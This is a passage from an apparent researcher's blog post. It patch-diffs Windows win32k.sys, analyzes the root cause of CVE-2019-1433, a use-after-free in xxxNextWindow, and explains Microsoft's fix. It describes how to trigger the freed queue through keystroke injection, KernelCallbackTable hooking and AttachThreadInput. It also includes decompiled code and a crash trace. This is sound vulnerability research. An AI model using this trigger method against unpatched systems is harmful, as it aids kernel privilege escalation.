kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. 
He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. 
If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\n** \n**\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\n** \n**\n\nOn James Forshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\n** \n**\n\nNow that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\n** \n**\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. 
To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. 
About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n** \n**\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\n** \n**\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. 
This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\n** \n**\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\n** \n**\n\nI decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. 
In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\n** \n**\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n** \n**\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. 
I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\n** \n**\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n** \n**\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. 
If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User- Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n * This was an analysis of a vulnerability also related to xxxNextWindow. 
This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. \n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set-up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\n** \n**\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create crash POC. 
\n\n# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n** \n**\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. 
As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n<ALT (Extended)> \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. \n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. 
\n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-mode callback is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. \n\n** \n**\n\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n\n[...]\n\n \n\n\nV43 = 0;\n\nwhile ( 1 ) {\n\nif (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&\n\ngspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n\ngspwndAltTab->bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64;\n\nif ( !v45 ) {\n\nThreadUnlock1();\n\ngoto LABEL_106;\n\n}\n\nhandleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); \u2190 USER MODE CALLBACK\n\nif ( v43 )\n\n{\n\nif ( v43 == handleOfNextWindowToHilite ) {\n\nv48 = 0i64;\n\nLABEL_103:\n\nThreadUnlock1();\n\nHMAssignmentLock(&gspwndActivate, v48);\n\nif ( !*(_QWORD *)&gspwndActivate )\n\nxxxCancelCoolSwitch();\n\nreturn;\n\n}\n\n} else { v43 = handleOfNextWindowToHilite; }\n\ntagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n\nif ( tagWndPtrOfNextWindow )\n\ngoto LABEL_103;\n\nisShiftPressed2 = isShiftPressed;\n\n}\n\n \n\n\n[...]\n\n \n\n\nLABEL_106:\n\nv11 = queue->spwndActive; \u2190 USE AFTER FREE\n\nif ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {\n\n \n\n\n[...] 
\n \n--- \n \n** \n**\n\n#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\n** \n**\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\n** \n**\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. 
Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n** \n**\n\nif (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&\n\ngspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n\ngspwndAltTab->bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64; \n \n--- \n \n** \n**\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.\n\n** \n**\n\n## WINDOWS 10 \n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\n** \n**\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\n** \n**\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. 
Below are excerpts from the crash.\n\n** \n**\n\n*******************************************************************************\n\n* *\n\n* Bugcheck Analysis *\n\n* *\n\n*******************************************************************************\n\n \n\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\n \n\n\nFAULTING_IP:\n\nwin32kfull!xxxNextWindow+743\n\nffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]\n\n \n\n\n# Child-SP RetAddr Call Site\n\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 \n\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 \u2190 UAF\n\n08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005\n\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n\n12 0000002b`2a5ffbb0 
00007ffb`7f487bd4 WizardOpium+0x1335 <\\- My POC\n\n13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n\n14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21\n\n \n\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 \n \n--- \n \n** \n**\n\nTo trigger the crash, I only had to change two things in the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\n** \n**\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update\n\n| \n\nDisassembly at xxxNextWindow+73F in Nov 2019 Update \n \n** \n**\n\nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n** \n**\n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\n** \n**\n\nOverall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. 
The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n** \n**\n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. \n\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Pre-Patch\n\n \n\n\n[](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Post-Patch\n\n \n\n\n## xxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.\n\n** \n**\n\nbt dword ptr [rbp+13Ch], 1Ah\n\njb loc_FFFFF9600017A0C9 \n \n--- \n \n** \n**\n\nIf the bit is set, the function exits (bt copies bit 0x1A of the flags dword into CF, so the jb is taken exactly when that bit is set). If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. 
\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n** \n**\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\n** \n**\n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\n** \n**\n\nThe new function, UnlockQueue, is used to unlock the queue. \n\n** \n**\n\nif ( !queue )\n\nqueue = 